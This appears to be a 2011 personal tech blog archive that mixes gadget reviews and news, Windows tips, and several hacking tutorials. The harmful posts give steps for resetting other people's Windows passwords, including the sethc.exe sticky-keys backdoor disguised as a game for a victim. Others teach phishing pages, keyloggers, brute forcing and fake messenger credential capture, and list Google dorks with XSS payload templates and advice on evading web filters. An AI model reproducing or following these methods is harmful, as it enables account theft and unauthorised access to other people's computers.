Saturday, 19 November 2011

Samsung MV800-Review


 
 
 
 
 
 
 
 
 
 
 
 
 
Samsung is touching the boundary with the Samsung MV800.Its 3-inch OLED touchscreen and there are only two buttons - home and image playback,5x optical zoom Schneider-Kreuznach lens, solid construction, liberal use of metal and a lightweight, attractive design.

The screen flips out and upward, Self portraits and videos are easy, thanks to the second shutter button hidden under the flip-out screen. You would think that you can't take a photo from a high angle since the screen does not flip down - but you can just take a photo with the camera upside down, and it'll automatically rotate the image.

The touchscreen is responsive and has large colourful icons - the interface might remind you of a smartphone rather than a camera which is a good thing. This is not a camera for the serious hobbyist or for someone who wants to learn photography. It is a camera for someone who just wants to take fun photographs. So there's no manual exposure mode, but the sheer number of effects, filters, frames and scene modes available is mind-boggling.

You can take photographs with various scenes landscape, beach, sunset etc, within various frames, with vignetting, miniature effect, soft focus, sketch, painting, cartoon, with funny face morphing effects, picture in picture, beauty shot automatic blemish correction or with auto background defocus. 
 
Its effects, fix red eye, crop, rotate, adjust saturation, change contrast & brightness and change colour balance. Then there's the 3D mode and an excellent Live Panorama mode  just pan the camera and it automatically stores a panoramic image,you could label as downright cheesy. the Theme Album lets you choose from one of three themes  the camera then temporarily places photos in a slideshow with music and page-turn animation effects.

The Pose Guide shows you 20 different images of a woman in different poses you can select any one and the camera will put a wireframe overlay on the screen, to allow you to position your subject in exactly the same way. It's handholding, but taken to a new extreme.

Image quality is a mixed bag noise is the biggest problem. Even after manually setting ISO to 80, noise is visible indoors. And battery life could be a sore point for some  it can only manage a limited 100 to 120 shots on a charge. Buy it if you need something out-of-the-ordinary. Otherwise, look at Sony HX7V which offers better performance at the same price of Rs 15,990.

Tuesday, 1 November 2011

Motorola Razr is coming in india...


Motorola Mobility is set to release Motorola Razr smartphone in the Indian market next week, barely a fortnight after it unveiled the phone in the US with Verizon.The phone is yet to be launched anywhere in the world Sporting a 4.3-inch super AMOLED advanced display, the successor to Motorola's iconic Razr phone is expected to be priced around Rs 32,000 in India. However, Verizon has announced the airtime bundled price of the Droid Razr as it will be called in the United States will be $300, or around Rs 15,000, with a two-year agreement.
The India launch of what is touted as world's thinnest 4G smartphone will be part of a global high-octane launch by Motorola Mobility, its first major launch after acquisition by Google. The company has high hopes pinned on the product, especially after a lukewarm reception to its tablet Xoom.

Motorola Razr comes with front-facing 720p HD video camera and an 8 megapixel rear-facing camera with 1080p HD video capture capability. It has 1GB of RAM, a dual-core 1.2GHz processor and runs Android 2.3 Gingerbread by Google, Razr has Kevlar fiber and Corning Gorilla Glass to withstand scratches and scrapes. According to the company, every part of Razr is protected by a splash-guard coating, including the electrical boards inside. The phone will offer upto 10 hours talktime or 13.5 days standby on 3G usage.
Its most successful predecessor, Motorola Razr was originally launched in summer of 2004. Over next 4years, Motorola sold over 130 million units of the phone, thus making it the best-selling clamshell flip phone in the world.

Google Started registrations for Galaxy Nexus in india....


 
India may figure among the 18 select countries where technology giant Google would launch its upcoming smartphone Galaxy Nexus,widely being billed as an iPhone-killer, in its first phase later this month.

Google aims to make available this device, which would rival technology major Apple's smartphone iPhone, later this month in the US,Canada, and select European and Asian countries. It has launched specific web pages for India and 17 other countries, where prospective customers can register for getting further updates about the various features and availability status of Galaxy Nexus.
 
India other countries which will receive the upcoming smartphone in the first phase are Australia, Brazil, France, Hong Kong,Japan,Singapore,Portugal,United States,UK,Taiwan,Thailand and Netherlands.
 
Galaxy Nexus would be based on the latest version of Google's flagship Android mobile operating system, named Android Ice Cream Sandwich. this device would have features like 1.2 GHz dual core processor, 4.65 inch HD display and the facility of fourth generation telephony services and Ice Cream Sandwich, our mission was to build a mobile OS that works on both phones and tablets, and to make the power of Android enticing and intuitive Google said.

Friday, 30 September 2011

Skype download facebook integrated.....

  • open ur facebook account
  • Facebook Instant Messaging - chat with your Facebook friends directly from Skype.
  • Facebook Contacts Tab - a new tab within Skype dedicated to your Facebook contacts list.
  • 'Like' and even comment on a Facebook status - You can also use the Facebook News Feed within Skype to easily "like" a friend's status or comment on it without logging into Facebook.
  • New Call Control Toolbar - featuring redesigned graphic icons.
  • Improvements to the saving of a phone number in the "Call Phones" section.
  • Visual improvements to placing a call on hold.

Download the facebook data......

  •  open ur account
  • download your copy
  •  Your profile information (e.g., your contact information, interests, groups)
  • Wall posts and content that you and your friends have posted to your profile
  • Photos and videos that you have uploaded to your account
  • Your friend list
  • Notes you have created
  • Events to which you have RSVP’d
  • Your sent and received messages
  • Any comments that you and your friends have made on your Wall posts, photos, and other profile content

Password set in mozilla firefox....

1. Open firefox and go to Options > Options.
2. Now click on “Security” tab from option window. Here you can see the  “ Use master password” option, enable tick on check box, which pops up a window to set the master password.
3. A new screen will pop up and ask for a master password. Enter your password and press OK. 
4. Now whenever a person try for check Saved Passwords it will ask for Master Password. Without enter Master Password he wouldn't be use saved passwords for websites.

Fix the windows boot.ini file......

  1. Turn on the broken windows computer.
  2. Insert the Windows CD.
  3. On the BIOS loading screen, press the button to choose the boot location (F12).
  4. Choose "IDE Disk Drive" or the CD option.
  5. Press R to access the Windows Recovery Console.
  6. Press 1 and enter. When this loads, it will ask what Windows installation you are repairing. Type 1 then press enter.
  7. Enter the password. It will then ask for the computer admin password. Type it in and press enter. If there is no password just press enter.
  8. From here it should go onto a command line starting with C:\\ or the name of the drive the Windows installation is on.
  9. Type bootcfg /rebuild.
  10. This will scan the computer for the installation. It will then ask "Add installation to boot list? (Yes/No/All). " Press Y and hit enter. This may take some time to do.
  11. Then it will ask to "Enter load identifier". Type the version of Windows installed. e.g Windows XP Home Edition" and enter.
  12. Finally it asks for to "Enter OS Load". Type /Fastdetect and press enter.
  13. Type exit and remove the disk.

Crack windows password..........

 Cracking windows password...
step 1-click on start and then on run
step 2-type cmd and press enter.
now a you are on a black window of command prompt...
step 3-.Suppose you want to change the password of the account name lolu
Now it ask for new password. Type your new password. Be careful because  password will not be shown to you while typing.then retype your password for next step.
you have successfully changed system password.
Change other person's system password using above trick whenever get chance to work on his/her system and he is not there at that time
Try to open computer in safe mode. If administrator account is not password protected login with admin account and use above command for changing its password.

go to C:\WINDOWS\system32
copy cmd.exe to desktop and rename it to sethc.exe
move this new sethc.exe to C:\WINDOWS\system32 replace previous file with this new file

After this whenever you want to login into the system press shift key 5 times at login screen. Now you are on cmd. Change password of any account using above cmd command.You can create a batch file for these copy, rename and move steps and convert it to exe using bat to exe converter . Rename this exe to a game name and give it to the user whose computer you wanna hack.

Disable autorun to protect your windows......

Disable autorun feature of windows. Virus is always use Autorun feature to spread itself from pendrive or other media. We can also disable autorun from windows registry but it will not disable this feature permanently. Use this patch to disable it permanently Download Link After running this patch autorun feature will be permanently disabled from windows.

Create the Virus for websites.......

Create the virus for websites. This C code is only the implementation of my previous post How to block a website without any software  I am implementing that process by a C program to create it as a virus. Once the virus is clicked, it will block the some specific websites on victim's computer. The website which you want to block is mentioned in the source code of the program. Change the list according to your choice....

Get permanently deleted file in windows....

Get permanent deleted files in windows. oh god what i have done that was an important  file. At this condition we can restore files from Recycle bin but most of us have habbit of using shift+del for deleting files from the system. So this can be a big loss for you. so what to do if we have deleted a file permanently from the system. Restore Deleted Files Now is a free software which can be used to restore your accidentally deleted files. After downloading the software from here install it on your computer.

Get best startup performance in win7.....

startup Performance in windows 7 , you always see starting windows Home screen that takes 6-10 seconds and thus waste your some time at this starting screen. But you can boost your starting time in windows by removing starting windows screen.
You can do this by following some easy steps. Go to Run and type msconfig and press enter Now click on boot tab and search for NO GUI BOOT and mark the box. Now click on apply and ok. Restart the pc.Now that starting windows splash screen will not run and you will get directly to window

Protect the usb flash drive....

Protect the USB  If you want protect your USB drive, you can do it with the given registry trick or batch script. Protecting USB drive depends on Registry, and you can do it manually or by the script. Read below.
Mannual way is also given along with batch script Manually:
1- Start > Run > type “regedit” to open regisry editor
2- Navigate to this: HKey_LOCAL_MACHINESystemCurrentControlSetControl 3- Create a new key with the name “StorageDevicePolicies”
4- On the right side, Create a new “DWORD Value” with thr name Write Protect and give it “1" as Data
5- Then put the USB Flash Drive.
6- Try to Delete a file Or Copy something to it, You will not be able to do that.
7- To disable this feature, just change the data from 1 To 0 The

High disk performance by defragmentig Your disk.....

Best windows & disk performance by defragmenting your disk if you are facing slow computer & disk performance on windows, it may be the problem of fragmentation. Fragmentation makes your hard disk do extra work that can slow down your computer. Disk Defragmenter rearranges fragmented data so your hard disk can work more efficiently. Disk Defragmenter runs on a schedule, but you can also defragment your hard disk manually. 1:Open Disk Defragmenter by clicking the Start button , clicking All Programs, clicking Accessories, clicking System Tools, and then clicking Disk Defragmenter.

How to Install windows Bootmgr........

All Windows BOOTMGR is a utility used to boot your computer past the 8GB threshold; it creates and hides partitions, as well as supports the password protection function. For varying reasons, BOOTMGR may not work properly, this could be due to corrupt files or malware. Restart the pc you will have to reinstall it. With the Windows OS installation disc, it will automatically recognize that BOOTMGR is missing and reinstall it for you. Place the Windows installation disc into the computer's CD/DVD drive and reboot the computer. Press "Enter" to load the computer from the installation disc. Choose your default language and click "Next." Click "Repair Your Computer." Select "Windows 7," "Next." The repair...

Recover windows deleted files.....

Revocer All deleted files in all windows we accidently delete some files and then regret on that. Sometimes its very panic if there is some important document. But you can recover any deleted file in windows by using the method i am going to describe. If you have done normal deletion, the file will be on recycle bin but file deleted by shift+DEL will not be anywhere. So you have to download a software for that.

Make ur xp like win7...

XP look like windows 7 windows xp and want the look and feel of windows 7 without leaving your XP. You can change the look and feel of windows XP to look like windows 7. Warking with windows xp which look like 7 feels great. just follow some simple steps to change the look of your windows xp Try these tools Download Viorb, a free tool to change look. ViOrb is a very small start button replacement for Microsoft Windows XP OS. Download it from here: http://www.softpedia.com/progDownload/ViOrb-Download-100126.htm

Repair ur windows with windows repair.........

Repair your all windows with Windows Repair Windows is the most popular operating system but it is most affected by the virus and other type of computer threats. Many times these threats cause windows problems.Malware and other virus programs can modify your default settings. This type of problems are not new with the windows users. But formating your windows each time when you face these problems is not the solution. So try this cool software which is Windows Repair (All In One). This software can repair most of the common windows problems and can restore your winodws to its original settings. Main features  Reset Registry...

Sunday, 25 September 2011

Become a topper in google.....

All websites should be optimized well for Search Engines in order to get top rankings in SERPs And when it comes to Search Engine Optimization , the most important factor is Quality Link Building.
Link Building service is a strategy/technique to get relevant links to your website from good ranking websites in your niche so that the top search engines like Google, Yahoo, Bing and others rank your website higher in their Search Results.
Many of you may tried to build lot of backlinks to your website spending lot of hours in a day. But, Have you ever wondered how many number of links should i have for my website (or) what method should i use to get backlinks
Types of Links Building: 5 Star Rating
Content Distribution
Description: BackLinks from press release sites, article writing, guest blog posts, Feed aggregators such as RSS feeds
Method to Obtain: Write unique and SEO optimized content & promote using social networking sites
Difficulty Score: #
Quality Score: ###
Blog/Forum Comments
Description: Links from forum signatures, blog commenting, posts, profiles
How to Obtain: Search relevant niche blogs & forum topics, register in those sites and create profiles, create signatures for forums using anchor text
Difficulty Score: #
Quality Score: ##
Purchased Links
Description: Links obtained through submitting in paid blog directories and other paid links
How to Obtain: Search for keywords + sponsor, advertise, sponsored by, banner ads, submit URL, add URL
Difficulty Score: *
Quality Score: **
WARNING: This type of link building is very dangerous and sometimes your website even gets penalized by Search engines. 
Reciprocal Links
Description: Links from exchanges, partnerships and trades (always go for topic relevant site sites)
How to Obtain: Use only high authority relevant sites to exchange with, try to do a 3 way link building instead of 2 way.
Difficulty Score: **
Quality Score: *
5.Social Media/Bookmarking
Description: Links from various social media profile pages and bookmarking sites
How to Obtain: Find top bookmarking sites based on PageRank, Alexa Rank, dofollow and submit website using good keyword anchored phrases
Difficulty Score: ***
Quality Score: ***
6.Embedded Content
Description: Links via widgets, infographics, badges, and other embeddedable content
How to Obtain: Develop visually appealing and valuable content, elevate via social networks
Difficulty Score: ###
Quality Score: ####
7.Link Reclamation
Description: Links to no longer available resources to re-point at your pages
How to Obtain: Check Google Webmaster Tools for pages not found, contact websites linking to those to change link or redirect to your site
Difficulty Score: ###
Quality Score: #####
Natural Links
Description: Links obtained naturally due to link worthy content and link baiting techniques, etc.
How to Obtain: Create quality, informative content (avoid duplicate content) and promote via social networks
Difficulty Score: ####
Quality Score: #####
9.Link Requests
Description: Links acquired through manual requests from webmasters, site owners, etc.
How to Obtain: manual email requests by conducting competitive link analysis (always opt for high PR sites)
Difficulty Score: ####
Quality Score: #####
Note: Calculate the ratings based on 5/5 factor.
The above link building structure tells you the value of each type of link building techniques.

Google Is Speedup Page loading time...

Google Start a new service Page Speed Service that accelerates webpage loading times by running them through a special application that rectifies bottlenecks and loads the pages to end users through Google’s global network of servers.
Google Head engineering manager Ram Ramani said in a blog post that in tests the service had increased load times by 25 to 60 per cent.
The New Page Speed Service fetches content from your servers, rewrites your pages by applying Web performance best practices, and serves them to end users via Google’s servers across the globe. Your users will continue to access your site just as they did before.

iPhone Company is overtaking blackberry in 2011

Worlds 1st i Phone maker Company has increased its mobile phone market share from 0.3% in 2007 to 2% in 2009, while RIM mobile phone market share increased from 1% to about 3% during the same period.  We expect Apple’s market share to overtake that of RIM by 2011, and for Apple and RIM to have 11% and 8% market share, respectively, by the end of Trefis forecast period.  We believe sales of the iPhone will eventually outpace BlackBerry sales for the following reasons:
Apple’s ecosystem of consumer products and services make the iPhone a more attractive phone for many consumers compared to the BlackBerry
End of AT&T exclusivity will give Apple’s iPhone wider distribution in the United States
iPhone is making inroads with business customers that have traditionally preferred the BlackBerry
However, RIM’s market share lead over Apple has been shrinking and we estimate that Apple will be able to overtake RIM market share by early 2011.
Below we explain the significance of mobile phones business for Apple and RIM, and why we think Apple will overtake RIM mobile phones market share in the near future.

HP Department Head Fired....

World1st Computers & laptop making industry Hewlett packard Head Apothecker has been removed from the tag as he is keen to play his role on the comapny’s ceo tag.He is not able to perform well, since he has become CEO he has dropped company’s sales by 47% which is a huge amount.
Leo Apotheker, who was fired by Hewlett-Packard’s board, was unaware that his credibility as a CEO was under scanner. Apotheker, who was ousted barely 11 months after joining the company, is being replaced by Hewlett Packard director and former eBay Inc CEO Meg Whitman.
which has hastily removed two CEOs in the past two years, is left in the lurch to cope up with dented investor confidence and its future strategies.
All HP employees, Apotheker expressed his confidence in HP’s future and Whitman’s strategic vision. Here’s the text of the letter as published on the site The Next Web.         

FB users facebook new look is bad...

Mark Zuckerberg showed off some of the most drastic changes ever made to the company’s service. And though Zuckerberg is excited by those changes, many folks across the Web aren’t so quick to celebrate.The fear among some users relates to what some say could become a potentially worrisome privacy situation on the social network, led by Timeline and changes to Open Graph.Timeline provides users with a way to view “the story of your life,” according to Zuckerberg, including a collection of all the “stories” uses have shared on Facebook over the years, as well as the pictures they’ve posted and the applications they’ve used.Facebook’s updated Open Graph will make the social network far more “sticky.” Zuckerberg said users will have the ability–thanks to Timeline and a new addition, Ticker–to see what a friend is doing, like watching a movie on Netflix or listening to a song on Spotify, and engage in that same activity from within the social network. The Facebook CEO said he believes the improvements will help create “a completely new class of social apps” that will let users share every single facet of their lives on the social network.
Facebook is getting too intrusive and sneaky,” One Amazed Human continued. “If I can find another place to play Scrabble, I’m probably out of there. I can live without it nicely. When it was fun, it was fun. It isn’t that anymore. Thanks, Zuckerberg. Why didn’t you just create something new to mess around with and leave Facebook as is?

Apple company has opened his long store in hong kong

As apple has started growing its market so as it has become one of the largest phone selling company by the syrvey conducted by some specialists last year.For the same we can notice the effect of its growing industry as it has opened his long awaited store in hong kong.

apple long awaited store in hong kong
Apple Department has opened its long-awaited first store in Hong Kong, with hundreds of fans of the computer and gadget maker pouring in on the first day.
Some Apple enthusiasts had camped out for nearly two days to secure a place at the head of the line and be among the first to walk through the doors of the new store Saturday.
The store is located on two floors linked by a glass spiral staircase in Hong Kong’s upscale International Financial Center Mall, in the city’s central business district.
The Cupertino, California-based company’s products are wildly popular in mainland China. Hong Kong store follows the opening of a third Shanghai store on Friday as the company boosts its presence in a key market. It also has two stores in Beijing.

Friday, 19 August 2011

How to acces Locked websites

Surfing at school? Parents enabled website blocking? Stuck behind a strict firewall? There are lots of ways around the problem so that you can get to the sites you want to see without those cybernannies tying your hands phproxy is “dedicated to bringing you fast web browsing from behind web filters”. Simply tap in the URL of that banned site you really must see, it could be Facebook, MySpace, Youtube, or a renegade blogger behind enemy lines, and you will be able to access it with no problems. More seriously, the proxy allows you to visit a site anonymously because it is the proxy itself that is visiting the banned site not you, and so keeps your browsing hidden from prying eyes allowing you to protect your online identity.
Such a proxy also allows you to visit sites that have banned your IP. This might be a forum or just a website or blog from which you or other users on your IP range (whether on your school or company network or your ISP account) have been barred access. The proxy server is an open gateway between your web destination and you.

Other proxies is available, such as www.the-cloak.com and this page provides a shipload more.

Of course, we should add a disclaimer at this point, please don’t use proxies or anonymizers to break the law or to cause malice and please don’t abuse the service as they are usually free.

Thursday, 18 August 2011

10 year old hacker finds zero day flaw in games affecting iOS and Android

CyFi, a girl from california, a 10 year old hacker discovered a zero day exploit and presented her findings at DefCon 19. She discovered the flaw around January 2011 because she "started to get bored" with the pace of farm-style games. She revealed a zero day exploit in a game on iOS and android devices.  Most of the games she discovered the exploit in have time-dependent factors. For example, planting corn might take 10 real-time hours to mature in the game. Manually advancing the phone or tablet's clock forced the game further ahead than it really was, opening up the exploit. She didn't reveal the name of the games affected at the confrence. Independent security researchers have also confirmied as a new class of vulnerability. She is also the co-founder of DefCon Kids. This is the

Secure a wireless lan

Following actions should be taken.

    * The most important thing is to change the default password of your access point.
    * Firmware and the drivers of your wireless access point and wireless adapters should be up to date. They should be updates whenever necessary.
    * There should be a combination of high level encryption and decent keys (WPA2/802.11i ) recommended.
    * Wireless users should be authenticated with different protocols like 802.1X, RADIUS, EAP (including EAP-PAX, EAP-PSK, EAP-TLS, EAP-TTLS, EAP-FAST, EAP-POTP, EAP-IKEv2, EAP-GPSK, PEAP, and EAP-SIM.
    * The above protocols give credentials including certificates, usernames, passwords etc.
    * Use Wireless LAN Security Tools for securing the wireless network. This software is specifically designed for securing 802.11 wireless networks.
    * Use a proxy for outgoing requests.
    * Always check the security of the wireless LAN using recent tools like Airbase, AirCrack-ng etc.
    * Make strict system logging on all the devices, do check your wireless log files regularly.

secure your lan, lan security, firewalls, anti-viruses,tcp , udp,lan,lan security,networking

Hacking An Email


Phishing is a way of saying keylogger but in an other meaning.Let’s say you want to create a hotmail phishing page.The page should look
exactly like the real one.
How does it work:
You can download/make a replica of the website you want to phish.And save is as HTML.When you’re done with that,you have to find a way
to upload the HTML.Best way is a Website.Like Piczo/Blogspot.When thats done the user types his/hers username and password.And automatically
it will be sent to you by mail.And there you have it,that’s Phishing.
Here Are Some Tutorials That Help:
http://www.hackforums.net/showthread.php?tid=15895
http://www.hackforums.net/showthread.php?tid=14154
http://www.hackforums.net/showthread.php?tid=12583
http://www.hackforums.net/showthread.php?tid=12468

Brute Forcing
Brute Forcing is like guessing the password , but instead you make/download a password list[a long txt file containing words that might be
the password] ad the Brute Forcer tries them all
Download your Msn Brute Forcer Here:
http://www.speedyshare.com/228815220.html [may find a trojan inside but that's normal]
Download Password Lists here:
http://www.hackforums.net/showthread.php?tid=15562

Keyloggers
Keyloggers is like phishing but is more simple.Its a simple .exe executable.When someone clicks it,the Keylogger auto downloads.And you’ll
have ,on your computer,you start it,and put in the ip of the destination,and every hour you’ll receive keys pressed on his computer
thats an easy way to find out msn passwords
Here are some tutorials:
http://www.hackforums.net/showthread.php?tid=15003
http://www.hackforums.net/showthread.php?tid=10365

Fake Msn
Fake msn is just a replica of Msn Messenger.Let some of your friends come over.And open up the fake msn.Let them type in ther
msn hotmail,and their password.Then they will get a troubleshoot , and their username/password will be saved in a .txt file in C:\
Download here:
http://www.savefile.com/files/1357897

Guessing The Secret Question
If you know your friends,this will be an easy task.Go to http://www.hotmail.com and click forgot password,then put in the email address
and then the CATCHA code,reply on the secret question,but beware because you have like 3 tries only.
Related posts:

Google Hacking

Google Hacking :-

Basic Operators:-
1) And (+) :- This operator is used to include multiple terms in a query which is to be searched in google.
example:- if we type "hacker+yahoo+science" in google search box and click search, it will reveal the results something which are related to all the three words simultaneously i.e. hacker, yahoo and science.

2 ) OR (|) :- The OR operator, represented by symbol( | ) or simply the word OR in uppercase letters, instructs google to locate either one term or another term in a query.

3) NOT :- It is opposite of AND operator, a NOT operator excludes a word from search.
example:- If we want to search websites containing the terms google and hacking but not security then we enter the query like "google+hacking" NOT "security".


Advanced Operators:-
1) Intitle :- This operator searches within the title tags.
examples:- intitle:hacking returns all pages that have the string "hacking" in their title.
intitle:"index of" returns all pages that have string "index of" in their title.
Companion operator:- "allintitle".

2) Inurl :- Returns all matches, where url of the pages contains given word.
example:- inurl:admin returns all matches, where url of searched pages must contains the word "admin".
Companion operator:- "allinurl".

3) Site :- This operator narrows search to specific website. It will search results only from given domain. Can be used to carry out information gathering on specific domain.
example:- site:www.microsoft.com will find results only from the domain www.microsoft.com

4) Link :- This operator allows you to search for pages that links to given website.
example:- link:www.microsoft.com
Here, each of the searched result contains asp links to www.microsoft.com

5) Info :- This operator shows summary information for a site and provides links to other google searches that might pertain to that site.
example:- info:www.yahoo.com

6) Define :- This operator shows definition for any term.
example:- define:security
It gives various definitions for the word "security" in different manner from all over the world.

7) Filetype :- This operator allows us to search specific files on the internet. The supported file types can be pdf, xls, ppt, doc, txt, asp, swf, rtf, etc..
example:- If you want to search for all text documents presented on domain www.microsoft.com then we enter the query something like following.
"inurl:www.microsoft.com filetype:txt"


POPULAR SEARCH:

Google Search :- "Active Webcam Page" inurl:8080
Description- Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross site scripting.

 Google Search :- "delete entries" inurl:admin/delete.asp
Description- AspJar contains a flaw that may allow a malicious user to delete arbitrary messages. The issue is triggered when the authentication method is bypassed and /admin/delete.asp is accessed directly. It is possible that the flaw may allow a malicious user to delete messages resulting in a loss of integrity.

 Google Search :- "phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
Description- This search gives hundreds of existing curriculum vitae with names and address. An attacker could steal identity if there is an SSN in the document.

 Google Search :- inurl:*.exe ext:exe inurl:/*cgi*/
Description- a cgi-bin executables xss/asp injection miscellanea: some examples: inurl:keycgi.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/keycgi.exe?
cmd=download&product=">[XSS HERE]
inurl:wa.exe ext:exe inurl:/*cgi*/ xss:
http://[target]/[path]/cgi-bin/wa.exe?SUBED1=">[XSS HERE] inurl:mqinterconnect.exe
ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/mqinterconnect.exe?
poi1iconid=11111&poi1streetaddress=">[XSS HERE]
&poi1city=city&poi1state=OK

 Google Search :- intitle:"index of" finance.xls
Description- Secret financial spreadsheets 'finance.xls' or 'finances.xls' of companies may revealed by this query.

 Google Search :- intitle:"index.of" robots.txt
Description- The robots.txt file contains "rules" about where web spiders are allowed (and NOT allowed) to look in a website's directory structure. Without over-complicating things, this means that the robots.txt file gives a mini-roadmap of what's somewhat public and what's considered more private on a web site. Have a look at the robots.txt file itself, it contains interesting stuff. However, don't forget to check out the other files in these directories since they are usually at the top directory level of the web server!

 Google Search :- intitle:index.of.admin
Description- Locate "admin" directories that are accessible from directory listings.

 Google Search :- inurl:"nph-proxy.cgi" "start browsing"
Description- Returns lots of proxy servers that protects your identity online.

Wireless Network Hacking


Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.
The step by step procerdure in wireless hacking can be explained with help of different topics as follows:-

1) Stations and Access Points :- A wireless network interface card (adapter) is a device, called a station, providing the network physical layer over a radio link to another station.
An access point (AP) is a station that provides frame distribution service to stations associated with it.
The AP itself is typically connected by wire to a LAN. Each AP has a 0 to 32 byte long Service Set Identifier (SSID) that is also commonly called a network name. The SSID is used to segment the airwaves for usage.

2) Channels :- The stations communicate with each other using radio frequencies between 2.4 GHz and 2.5 GHz. Neighboring channels are only 5 MHz apart. Two wireless networks using neighboring channels may interfere with each other.

3) Wired Equivalent Privacy (WEP) :- It is a shared-secret key encryption system used to encrypt packets transmitted between a station and an AP. The WEP algorithm is intended to protect wireless communication from eavesdropping. A secondary function of WEP is to prevent unauthorized access to a wireless network. WEP encrypts the payload of data packets. Management and control frames are always transmitted in the clear. WEP uses the RC4 encryption algorithm.

4) Wireless Network Sniffing :- Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. It is easier to sniff wireless networks than wired ones. Sniffing can also help find the easy kill as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

5 ) Passive Scanning :- Scanning is the act of sniffing by tuning to various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all.

6) Detection of SSID :- The attacker can discover the SSID of a network usually by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Requests, Probe Responses, Association Requests, and Reassociation Requests. Recall that management frames are always in the clear, even when WEP is enabled.
When the above methods fail, SSID discovery is done by active scanning

7) Collecting the MAC Addresses :- The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames.

8) Collecting the Frames for Cracking WEP :- The goal of an attacker is to discover the WEP shared-secret key. The attacker sniffs a large number of frames An example of a WEP cracking tool is AirSnort ( http://airsnort.shmoo.com ).

9) Detection of the Sniffers :- Detecting the presence of a wireless sniffer, who remains radio-silent, through network security measures is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

10) Wireless Spoofing :- There are well-known attack techniques known as spoofing in both wired and wireless networks. The attacker constructs frames by filling selected fields that contain addresses or identifiers with legitimate looking but non-existent values, or with values that belong to others. The attacker would have collected these legitimate values through sniffing.

11) MAC Address Spoofing :- The attacker generally desires to be hidden. But the probing activity injects frames that are observable by system administrators. The attacker fills the Sender MAC Address field of the injected frames with a spoofed value so that his equipment is not identified.

12) IP spoofing :- Replacing the true IP address of the sender (or, in rare cases, the destination) with a different address is known as IP spoofing. This is a necessary operation in many attacks.

13) Frame Spoofing :- The attacker will inject frames that are valid but whose content is carefully spoofed.

14) Wireless Network Probing :-
The attacker then sends artificially constructed packets to a target that trigger useful responses. This activity is known as probing or active scanning.

15) AP Weaknesses :-
APs have weaknesses that are both due to design mistakes and user interfaces

16) Trojan AP :- An attacker sets up an AP so that the targeted station receives a stronger signal from it than what it receives from a legitimate AP.

17) Denial of Service :- A denial of service (DoS) occurs when a system is not providing services to authorized clients because of resource exhaustion by unauthorized clients. In wireless networks, DoS attacks are difficult to prevent, difficult to stop. An on-going attack and the victim and its clients may not even detect the attacks. The duration of such DoS may range from milliseconds to hours. A DoS attack against an individual station enables session hijacking.

18) Jamming the Air Waves :- A number of consumer appliances such as microwave ovens, baby monitors, and cordless phones operate on the unregulated 2.4GHz radio frequency. An attacker can unleash large amounts of noise using these devices and jam the airwaves so that the signal to noise drops so low, that the wireless LAN ceases to function.

19) War Driving :- Equipped with wireless devices and related tools, and driving around in a vehicle or parking at interesting places with a goal of discovering easy-to-get-into wireless networks is known as war driving. War-drivers (http://www.wardrive.net) define war driving as “The benign act of locating and logging wireless access points while in motion.” This benign act is of course useful to the attackers.
Regardless of the protocols, wireless networks will remain potentially insecure because an attacker can listen in without gaining physical access.

Shutdown Command via command prompt

Shutdown Command Via Command Prompt :-

The 'Shutdown' Command Becomes More Flexible and Automated when used from the Command Prompt.

To Run the 'Shutdown' command from the command prompt, go to 'Start > Run', type 'cmd', and press 'Enter'.
In the black box (the command prompt) type 'Shutdown' and the Switches you want to use with the 'Shutdown' command.
You have to use at least one switch for the shutdown command to work.

The Switches :-
The 'Shutdown' command has a few options called Switches. You can always see them by typing 'shutdown -?' in the command prompt if you forget any of them.

-i: Display GUI interface, must be the first option
-l: Log off (cannot be used with -m option)
-s: Shutdown the computer
-r: Shutdown and restart the computer
-a: Abort a system shutdown
-m \\computername: Remote computer to shutdown/restart/abort
-t xx: Set timeout for shutdown to xx seconds
-c “comment”: Shutdown comment (maximum of 127 characters)
-f: Forces running applications to close without warning
-d [u][p]:xx:yy: The reason code for the shutdown u is the user code p is a planned shutdown code xx is the major reason code (positive integer less than 256) yy is the minor reason code (positive integer less than 65536)

Note :- I’ve noticed using a switch with a '-' sign doesn’t work sometimes.
If you are having trouble try using a '/' in place of '-' in your switches.

Examples :-
shutdown –m \\computername –r –f
This command will restart the computer named computername and force any programs that might still be running to stop.

shutdown –m \\computername –r –f –c “I’m restarting your computer. Please save your work now.” –t 120
This command will restart the computer named computername, force any programs that might still be running to stop, give to user on that computer a message, and countdown 120 seconds before it restarts.

shutdown –m \\computername –a
This command will abort a previous shutdown command that is in progress.

Using A Batch File :-
You can create a file that performs the shutdown command on many computers at one time.

In this example I’m going to create a batch file that will use the shutdown command to shut down 3 computers on my home network before I go to bed.

Open 'Notepad' and type the shutdown command to shut down a computer for each computer on the network.
Make sure each shutdown command is on its own line.
An example of what should be typed in notepad is given below-

shutdown –m \\computer1 –s
shutdown –m \\computer2 –s
shutdown –m \\computer3 -s

Increase Virtual Ram to make your pc faster

Follow the steps given below :-


1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard.
Another way is Right-Clicking 'My Computer' and then Select 'Properties'.

2) Click on the 'Advanced' tab.

3) Under 'Performance', click 'Settings'.

4) Then click the 'Advanced' tab on the button that pops up.

5) Under 'Virtual Memory' at the bottom, click 'Change'.

6) Click the 'Custom Size' button.

7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000).

8) Click 'Set', and then exit out of all of the windows.

9) Finally, Restart your computer.

10) You now have a faster computer and 1-2GB of Virtual RAM..!

Password Hacking

